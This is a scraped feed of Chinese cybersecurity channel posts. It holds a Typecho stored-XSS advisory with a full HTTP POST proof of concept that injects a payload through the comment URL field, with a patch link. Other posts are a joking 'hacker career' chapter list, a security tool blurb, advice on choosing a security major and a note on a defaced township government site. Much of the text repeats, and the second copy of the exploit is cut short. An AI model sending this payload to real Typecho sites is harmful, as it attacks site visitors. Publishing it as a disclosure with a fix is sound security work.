Typecho框架最近出现严重的xss存储型攻击漏洞,可直接getshell
描述
Typecho错误注释具有漏洞的URL,对任何具有xss有效载荷的文章进行评论,在Comments/usr/themes/default/comments.php中,只过滤开头没有任何其他保护,并直接回显到html,再次访问相同站点时可触发xss
poc
POST /index.php/archives/1/comment HTTP/1.1
Host: 127.0.0.1
Content-Length: 143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin:http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:http://127.0.0.1/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
author=123&mail=123%40123.com &url= http://xxx.xxx.com/ "></a><noscript>alert("hack")</noscript><a/href="#&text=123&_=9d8302e080b9c139354b528787f1e5e4
补丁地址https://github.com/typecho/typecho/releases/tag/v1.2.1-rc
描述
Typecho错误注释具有漏洞的URL,对任何具有xss有效载荷的文章进行评论,在Comments/usr/themes/default/comments.php中,只过滤开头没有任何其他保护,并直接回显到html,再次访问相同站点时可触发xss
poc
Host:
Content-Length: 143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin:
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
author=123&mail=123%
补丁地址https://github.com/typecho/typecho/releases/tag/v1.2.1-rc
GitHub
Release v1.2.1-rc · typecho/typecho
What's Changed
Fix checkVersion by @sy-records in #1356
修复Sqlite目录带.校验不通过问题 by @maoxian-1 in #1357
Pr/1344 by @joyqi in #1360
Fix pgsql reset id error by @sy-records in #1369
Update admin welc...
Fix checkVersion by @sy-records in #1356
修复Sqlite目录带.校验不通过问题 by @maoxian-1 in #1357
Pr/1344 by @joyqi in #1360
Fix pgsql reset id error by @sy-records in #1369
Update admin welc...
❤3👏2👍1
第一章:沉淀
第二章:青春终于败给了资本,那场高考毁了我的本科梦
第三章:大专也是大学
第四章:专业网安,未来的黑客
第五章:专升本失败,直接就业少走几年弯路
第六章:距某ctfxx天,顶峰相见
第七章:比赛都是套路,专心实战
第八章:两天护网兵,一生国企情
月薪三千五,华亭也是亭
第九章:主管不是人,愤然辞职
第十章:黑客烧烤
第十一章:烧烤店倒闭,黑客维修
第十二章:行业不吃香,黑客代驾
第十三章:吊销驾驶证,碧桂园五星上将
第十四章:教训不只好歹的业主,欺负落单的外卖员,遇到危险全身而退
第十五章:资深java程序员在家待业
第十六章:入职🐎士兵 《暗网黑客渗透》《kali渗透从入门到精通》《红客联盟内训》《一秒获取女神信息,黑客有多可怕》
第十七章:接触Telegram,黑客之神王者归来
第十八章:入侵美韩,横扫台湾,一声令下十万0day归来,北约闻风丧胆,博彩网站后台更不在话下,各种实时数据收钱拿站
第十九章:个户全户三网机主q反微反接码点号轰炸机,最后喜提反诈
大结局:西工大被美国攻击,若有召,战必回!
#黑客# #渗透# #匿名者# #网络安全#
#APT# #Kali# #红客联盟# #北约# #技术纯享# #FBI# #暗网#
原创,转载请标明出处
第二章:青春终于败给了资本,那场高考毁了我的本科梦
第三章:大专也是大学
第四章:专业网安,未来的黑客
第五章:专升本失败,直接就业少走几年弯路
第六章:距某ctfxx天,顶峰相见
第七章:比赛都是套路,专心实战
第八章:两天护网兵,一生国企情
月薪三千五,华亭也是亭
第九章:主管不是人,愤然辞职
第十章:黑客烧烤
第十一章:烧烤店倒闭,黑客维修
第十二章:行业不吃香,黑客代驾
第十三章:吊销驾驶证,碧桂园五星上将
第十四章:教训不只好歹的业主,欺负落单的外卖员,遇到危险全身而退
第十五章:资深java程序员在家待业
第十六章:入职🐎士兵 《暗网黑客渗透》《kali渗透从入门到精通》《红客联盟内训》《一秒获取女神信息,黑客有多可怕》
第十七章:接触Telegram,黑客之神王者归来
第十八章:入侵美韩,横扫台湾,一声令下十万0day归来,北约闻风丧胆,博彩网站后台更不在话下,各种实时数据收钱拿站
第十九章:个户全户三网机主q反微反接码点号轰炸机,最后喜提反诈
大结局:西工大被美国攻击,若有召,战必回!
#黑客# #渗透# #匿名者# #网络安全#
#APT# #Kali# #红客联盟# #北约# #技术纯享# #FBI# #暗网#
👍33😁15💩5🤣5🤬2
弱口令检测、模拟定级、自动化运维、Windows、多线程Linux、MySql、Redis、Pgsql、SqlServer、Oracle、h3c、华为批量执行命令、等保工具(网络安全等级保护现场测评工具)内置3级等保核查命令、基线核查工具
可满足基本增加资产、运行不同模式、运行Cli指令,增加了基于Web的多主机以及单主机不同模式的基本运行功能。完整使用功能建议使用Cli版本
可满足基本增加资产、运行不同模式、运行Cli指令,增加了基于Web的多主机以及单主机不同模式的基本运行功能。完整使用功能建议使用Cli版本
马上就要高考志愿填报了,频道里可能有想学网安专业的,作为当年被招考老师忽悠的受害者大概科普一下这个专业的填报经验
如果高考分数没上本科线就不要考虑网安或者计算机方向。整个互联网无论是开发还是安全这几年都卷得不行,长亭这种T3安全企业去年招聘的几个学历是一个南航一个华南理工加我一个电子科大,南航那个还是研究生,大专学网安不是当保安就是送外卖
网安不卷还贼有钱,放屁。这个是本专业招考老师忽悠人的经典话术。国内就业分为蓝队红队,蓝队确实不是特别忙但工资低,月薪三千的安服大有人在。你们看到的二三十K的岗位,渗透测试工程师,漏洞研究员,逆向工程师等都属于红队,卷得不比开发岗轻松,时刻关注最新的威胁情报和技术文章等,不到两年毛就掉完了
还有任何安全岗位,都存在负责问题。有人说安服小事不用管大事管不了,这个话很中肯,但企业不会管这个,花了钱养你有0day打过来你也得硬着头皮上。安服可以摸鱼吗?可,不出事也确实没哪个管你,一但倒霉丢工作算轻,像我这种手里几个gov的就只有等着进局子了
关于填报,纯外行会说学计算机,懂一点的会说信息安全或者网络空间安全,实际上不止。软件工程,网络工程,通信安全是网安里逆向,web等单个方向的专精,学完过后本领域的基础知识和某些拓展大概率比网安本专业的更强。计算机科学与技术是最大的专业,包括安全与开发。这四个专业学完过后考研转安全或是自己上一下网课就业是完全没问题的。很多大学没有给网安专门开设专业,电子信息类,计算机类,工科试验班这几个都可能会有网安方向
最顶的选择是本科选应用数学再考研网安
T0到T5的相关院校
清北浙
华科,哈工大,南大,北航
电子科大,川大,北邮,上交
北交,北理,中科大,同济,西电,西交
南开,东北大学,吉林大学,中南大学,西工大,人大,天津大学,大连理工,东南大学
北科,南航,杭州电子科技大学,合工大,厦大,华南理工,中山大学,重大
附:
1.虽然web渗透是大家最感兴趣的,但确实强烈不建议学这个方向,神仙太多了大家都在往这里面卷,今后前景好的应该是云安全,嵌入式,二进制等方向,工资高的也都得兼顾开发和安全能力
2.像华东师大这种虽然开了信安专业但是专业课程不是你们感兴趣的学校我就直接排了
3.还有几个军校,国防科技大学,解放军信息工程大,陆军工程大学,火箭军工程大学,想参军的也可以自行考虑,包括电子对抗技术这个专业被称作军校网安,我不很懂你们只有自行去了解
如果高考分数没上本科线就不要考虑网安或者计算机方向。整个互联网无论是开发还是安全这几年都卷得不行,长亭这种T3安全企业去年招聘的几个学历是一个南航一个华南理工加我一个电子科大,南航那个还是研究生,大专学网安不是当保安就是送外卖
网安不卷还贼有钱,放屁。这个是本专业招考老师忽悠人的经典话术。国内就业分为蓝队红队,蓝队确实不是特别忙但工资低,月薪三千的安服大有人在。你们看到的二三十K的岗位,渗透测试工程师,漏洞研究员,逆向工程师等都属于红队,卷得不比开发岗轻松,时刻关注最新的威胁情报和技术文章等,不到两年毛就掉完了
还有任何安全岗位,都存在负责问题。有人说安服小事不用管大事管不了,这个话很中肯,但企业不会管这个,花了钱养你有0day打过来你也得硬着头皮上。安服可以摸鱼吗?可,不出事也确实没哪个管你,一但倒霉丢工作算轻,像我这种手里几个gov的就只有等着进局子了
关于填报,纯外行会说学计算机,懂一点的会说信息安全或者网络空间安全,实际上不止。软件工程,网络工程,通信安全是网安里逆向,web等单个方向的专精,学完过后本领域的基础知识和某些拓展大概率比网安本专业的更强。计算机科学与技术是最大的专业,包括安全与开发。这四个专业学完过后考研转安全或是自己上一下网课就业是完全没问题的。很多大学没有给网安专门开设专业,电子信息类,计算机类,工科试验班这几个都可能会有网安方向
最顶的选择是本科选应用数学再考研网安
T0到T5的相关院校
清北浙
华科,哈工大,南大,北航
电子科大,川大,北邮,上交
北交,北理,中科大,同济,西电,西交
南开,东北大学,吉林大学,中南大学,西工大,人大,天津大学,大连理工,东南大学
北科,南航,杭州电子科技大学,合工大,厦大,华南理工,中山大学,重大
附:
1.虽然web渗透是大家最感兴趣的,但确实强烈不建议学这个方向,神仙太多了大家都在往这里面卷,今后前景好的应该是云安全,嵌入式,二进制等方向,工资高的也都得兼顾开发和安全能力
2.像华东师大这种虽然开了信安专业但是专业课程不是你们感兴趣的学校我就直接排了
3.还有几个军校,国防科技大学,解放军信息工程大,陆军工程大学,火箭军工程大学,想参军的也可以自行考虑,包括电子对抗技术这个专业被称作军校网安,我不很懂你们只有自行去了解
❤6👍2👎2😁1🤔1
https://web.archive.org/web/20230619080605/https://www.mzjw.gov.cn/
麻江镇委官网被黑并挂上反动言论,目测应该是真的
这链接看着有点奇怪是因为麻江镇委相关人员已经关闭了服务器,web.archive是一家收录网站,可以看到一些网站几天前页面的样子,所以你们回来奇怪为什么有俩http
不是很懂镇这个行政单位大小,反正比县小(似乎和村差不多?)居然也能安排gov域名,我高考护网的时候重庆市教育考试院官网,就隔几天几万考生查成绩那地方都不是gov,属实抽象。这个网站应该很久没人维护了所以被打掉也不是什么太离谱的事,只能说性质有点恶劣,相关人员肯定是要追责的
侧面也反应了gov也不一定就是什么碰不得的话题…一个镇都能有个没人管的gov。第二个之前也说过,网站防护程度不是个绝对的东西,要说什么网站很难黑其实现在学半天就能搭的宝塔面板+lamp架构+WordPress傻瓜式的模板站最难黑,安装脚本复制粘贴的导致几个组件都是最新版本,自己又半行代码都不写,没0day完全动不了。而几年前装了waf的等保网站只要不更新维护没准一个漏扫工具加现成绕过脚本就按死了,毕竟当年的0day在现在没准也就是篇有cve编号和详细利用步骤的csdn烂大街文章
麻江镇委官网被黑并挂上反动言论,目测应该是真的
这链接看着有点奇怪是因为麻江镇委相关人员已经关闭了服务器,web.archive是一家收录网站,可以看到一些网站几天前页面的样子,所以你们回来奇怪为什么有俩http
不是很懂镇这个行政单位大小,反正比县小(似乎和村差不多?)居然也能安排gov域名,我高考护网的时候重庆市教育考试院官网,就隔几天几万考生查成绩那地方都不是gov,属实抽象。这个网站应该很久没人维护了所以被打掉也不是什么太离谱的事,只能说性质有点恶劣,相关人员肯定是要追责的
侧面也反应了gov也不一定就是什么碰不得的话题…一个镇都能有个没人管的gov。第二个之前也说过,网站防护程度不是个绝对的东西,要说什么网站很难黑其实现在学半天就能搭的宝塔面板+lamp架构+WordPress傻瓜式的模板站最难黑,安装脚本复制粘贴的导致几个组件都是最新版本,自己又半行代码都不写,没0day完全动不了。而几年前装了waf的等保网站只要不更新维护没准一个漏扫工具加现成绕过脚本就按死了,毕竟当年的0day在现在没准也就是篇有cve编号和详细利用步骤的csdn烂大街文章
👍5